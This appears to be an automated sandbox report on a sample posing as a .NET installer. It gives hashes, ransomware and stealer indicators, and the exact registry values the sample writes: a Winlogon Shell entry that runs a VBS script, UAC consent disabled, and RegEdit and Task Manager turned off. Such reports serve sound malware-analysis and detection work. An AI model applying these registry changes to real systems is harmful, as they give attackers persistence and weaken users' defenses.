SHA512 147d0c5725a2ff200e10becf1bebe74585ef110ba2a4c2c96eea4bb191d6484f8d5c2396cabb04d4de13a74c86d595dec88426e7200a432c5b28fef93eb73aa5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b6748848ca4ae5642d0c2cdfd736a520
SHA1 174d4c7f530dc50d84ba7be964ca050e8065736f
SHA256 af8b5aaf4de8061276f14e47312afc309080fa1e2e403e3148d8bae6f8e615ea
SHA512 c80a0f3cc230b427ea4dd4c56362625ebbe3613bba2dfe068164e9b07a305fd721f4d8031af83e3498c54a628603f68ae2f7efb8a6397fc5f21f4afa008f7bc5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 56e132f4dd8fb6a5917aafe7d5c30891
SHA1 879b61a3678ec019428c7a7c24843537d85d205d
SHA256 34c56a8109b0698e414f812a16e545bc6ed00009cf3cfb89fbc15732e8a5795a
SHA512 5d38efbf8b0c639452c79e4dbcb6ecc5e2add544ebc8d6cf21e4c6214c7bea51612d306c36d89da497117480ccb4e26097afa772b4c7f4669b546955d33bdc49

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 8b4fa47497b3bc6305457397e66a6bfe
SHA1 5a044f11cac2eb7b70fd04d0d5c3dc97e0ca93ba
SHA256 c4be0ae2374899ef341cf7b266a3aef59d50b485def58cf7471f6981f9651843
SHA512 ed6490118e3495357720c33b5044b533254c9aa35e0ae8b1ae9a5293cc2abe5cc7c4deebf6e294b98809bede0b3fdecdb5e58f5fa90578242629de2ac38b8bb8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d9e9edee2cdd630631ca22da7393badb
SHA1 6a4b34805e2c912c715df5bb94926eb284f33b5d
SHA256 b98ce4339037da082b697191ecfdc8779f26eb460f514aaac9bccd1188ede123
SHA512 ed3cbe7c893f0d13c5634bbeb959ca6e474aa0f4b025272afa3db45b61117ead506ace1cc85b041020d1a4ae2f7ad82a687a389bfdb438150c5fed74ca810307

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 aaef60ba8928e431a3cf2d899a1bceb9
SHA1 98e2046582169c5162b58883ed62f3568a849842
SHA256 c5fcec222e832b332751b76dcbc441bb33c6a80aafe9ca7c8a2bf2ce8ca37fca
SHA512 5a27ba53ac77126da9284805b8a6e13538e745aa6c92271de2c327370f9032ad76e841470dacacbcbd276898474bb4221cf44d6cd4017836ee74b9eb9380ea0e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 54e76084bbe67da1b094b78ceb37812b
SHA1 48925bd7ec59da098aed5bee7c23842f31349150
SHA256 a2d0e58c3be9d78ccbed8f9fbfe60e08fbbd830f2c5cc76fa24f3b48211144bb
SHA512 d6f454526609e9f648470c5dfba947c50170792494b2e767b7fdc7750b95566677dd4435f790a5b9b4ea78f7f598ae5a6bc21e364b3ddbec7822c96a1c81f540

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 84498b817f734a397d41aeab6a00a44b
SHA1 547eedb0a4762829ca5c4fe422ff9c62588ce4b0
SHA256 22812419775fb7b24a5cfd7397a9960e23625c08b801bafd9b2080a1d88a59ea
SHA512 c7a24bdf31adbde89d39448bbb6a6030c9c398130d52499a5a3db864b18440e4ae1ef46beba5e90a095edadd3c1f4494f99b93d3b71ee98849bca5f481eebde5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\afd51106-2d5a-4dff-9510-7b229f964a1e.tmp

MD5 282ad4b384717c51c83e78b7ec13d836
SHA1 82888caac171a1a70bc8ede06258c7bd8091cf28
SHA256 f7bcaa417f66230619b5ec78b40fdecd02bf1f2a5e3e0777ad370f87bc1f51ca
SHA512 e8d3e826c1028e90933ee3765e605a5e23ae92ebd5435132c4c8a79d1e1ca0a54dcbb45c897ba77493369157fdd0f4955e0a6d4986dfb8e973f624c453497904

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\016dfcff-a6f4-4b71-a750-2e7179983486.tmp

MD5 18784447ec18e95548ac7a17c45f1a9f
SHA1 4a6056a91c9a9563275fffe8065d08b607a1d818
SHA256 8772cb3b6fda466aa6f7f1daea94afe670e45e0b519ec66997a7c2eee5c94092
SHA512 acc774e7fdd3d04f57915a470136341a032ff0601db5b55bf78ead848a482e74040244353eca20334f1d0785e7c43b166990e0178adf93c5847621c30379a0b1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 909930e3ea2a4aa358c4af7219ce7ffa
SHA1 0ec53d4f01883def05cd44c2c21f4a6ae94a04ed
SHA256 cfd848106ca0812ff6cc6936855421bd619b5fe6efaa4ca33c11b8dae2669926
SHA512 650f57f714aafe618b71b09a5c16187cad76303a4751dc789c56f15051e6134c54a783a1764baa7e66239acbd79315538c4b06f577f2f1310f56098d0a41cf18

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 ee242a90d89ceee38d653d416f5dc8e1
SHA1 a275c20594e33acab5eff2a58e59ef97145615fb
SHA256 a2d9564b88c3c45738a397280b0856dd688ab42b9beee2a635ae3bcfbad1687e
SHA512 f9a9a7643dea4b258e287e1f2026b060353f48f0cafc9de99bc433408b119f7e60f297bbce48a286f6da0385495d5a78b88bc0a136398dbf8d936c56c363c0e0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 b8edcfc5623c096e3ee8ce0539798579
SHA1 fe7deda63eaa99441738b1e9fc84a35bd9e50ba8
SHA256 82bbbc95bc3904f5e290daf6490cbeecccc7b503c24415e06ce1fc7c68955e28
SHA512 72f99546a4b5f28a5bc98648f36a9b6810969ae952807d6f7c7450f121beddf0c5c2c84ae9d40372beac84f5d36a1a31b176571a70de931176f80c33365665f4

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-26 07:03

Reported

2024-06-26 07:10

Platform

win10v2004-20240611-en

Max time kernel

402s

Max time network

444s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dotNetFx40_Full_setup.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\bug32\\runner.vbs\"" C:\Windows\System32\wscript.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Consentpromptbehavioradmin = "0" C:\Windows\system32\wscript.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\System32\wscript.exe N/A

Renames multiple (499) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95} C:\Windows\system32\unregmp2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\DontAsk = "2" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\Version = "12,0,19041,1266" C:\Windows\system32\unregmp2.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\IsInstalled = "0" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\>{22d6f312-b0f6-11d0-94ab-0080c74c7e95}\Stubpath = "%SystemRoot%\\system32\\unregmp2.exe /ShowWMP" C:\Windows\system32\unregmp2.exe N/A

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools = "1" C:\Windows\System32\wscript.exe N/A

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\BUG32.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Windows\System32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation C:\Windows\System32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe N/A
N/A N/A C:\Users\Admin\Downloads\BUG32.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Bug32\\icon.ico" C:\Windows\System32\wscript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Music\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File created C:\Users\Admin\Music\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\OneDrive\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Pictures\desktop.ini C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File created C:\Users\Admin\Downloads\desktop.ini C:\Windows\System32\wscript.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Windows\system32\unregmp2.exe N/A
File created C:\Users\Admin\3D Objects\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Documents\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Favorites\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Searches\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Videos\desktop.ini C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File created C:\Users\Admin\Contacts\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Desktop\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Links\desktop.ini C:\Windows\System32\wscript.exe N/A
File created C:\Users\Admin\Saved Games\desktop.ini C:\Windows\System32\wscript.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\L: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\A: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\N: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\V: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\W: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\I: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\T: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\X: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\H: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\L: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\P: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Z: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\Q: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\O: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\Y: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\K: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\M: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\U: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\unregmp2.exe N/A
File opened (read-only) \??\J: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\R: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A
File opened (read-only) \??\S: C:\Program Files (x86)\Windows Media Player\wmplayer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Media Player\wmplayer.exe C:\Windows\system32\unregmp2.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll C:\Windows\system32\svchost.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\System32\wscript.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\2d1a5f6ae1e78fa0c8bf8beaee61\Setup.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\Cursors C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\Cursors\Arrow = "C:\\bug32\\bx.cur" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\Cursors\AppStarting = "C:\\bug32\\bx.cur" C:\Windows\System32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\Cursors\Hand = "C:\\bug32\\bx.cur" C:\Windows\System32\wscript.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133638590046410428" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\command C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\image\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{17FC1A80-140E-4290-A64F-4A29A951A867}\ = "Open Media Sharing Handler" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\video\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon C:\Windows\System32\wscript.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\command C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\ = "&Add to Windows Media Player list" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\command C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\ = "&Add to Windows Media Player list" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play\command C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\command C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Image\shell\Play\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9801" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{A45AEC2B-549E-405F-AF3E-C6B03C4FDFBF}\ = "Toggle DMR Authorization Handler" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\command C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\command\DelegateExecute = "{ed1d0fdf-4414-470a-a56d-cfb68623fc58}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\ = "&Add to Windows Media Player list" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Video\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Audio\shell\Play\NeverDefault C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Stack.Audio\shell\Enqueue\MUIVerb = "@%SystemRoot%\\system32\\unregmp2.exe,-9800" C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Play\ = "&Play with Windows Media Player" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shellex\ContextMenuHandlers\PlayTo C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\NetworkExplorerPlugins\urn:schemas-upnp-org:device:MediaRenderer:1\ShellEx\ContextMenuHandlers\{17FC1A80-140E-4290-A64F-4A29A951A867} C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\audio\shell\Enqueue\command\DelegateExecute = "{45597c98-80f6-4549-84ff-752cf55e2d29}" C:\Windows\system32\unregmp2.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Image\shell\Play C:\Windows\system32\unregmp2.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\SystemFileAssociations\Directory.Video\shellex\ContextMenuHandlers\PlayTo\ = "{7AD84985-87B4-4a16-BE58-8B72A5B390F7}" C:\Windows\system32\unregmp2.exe N/A
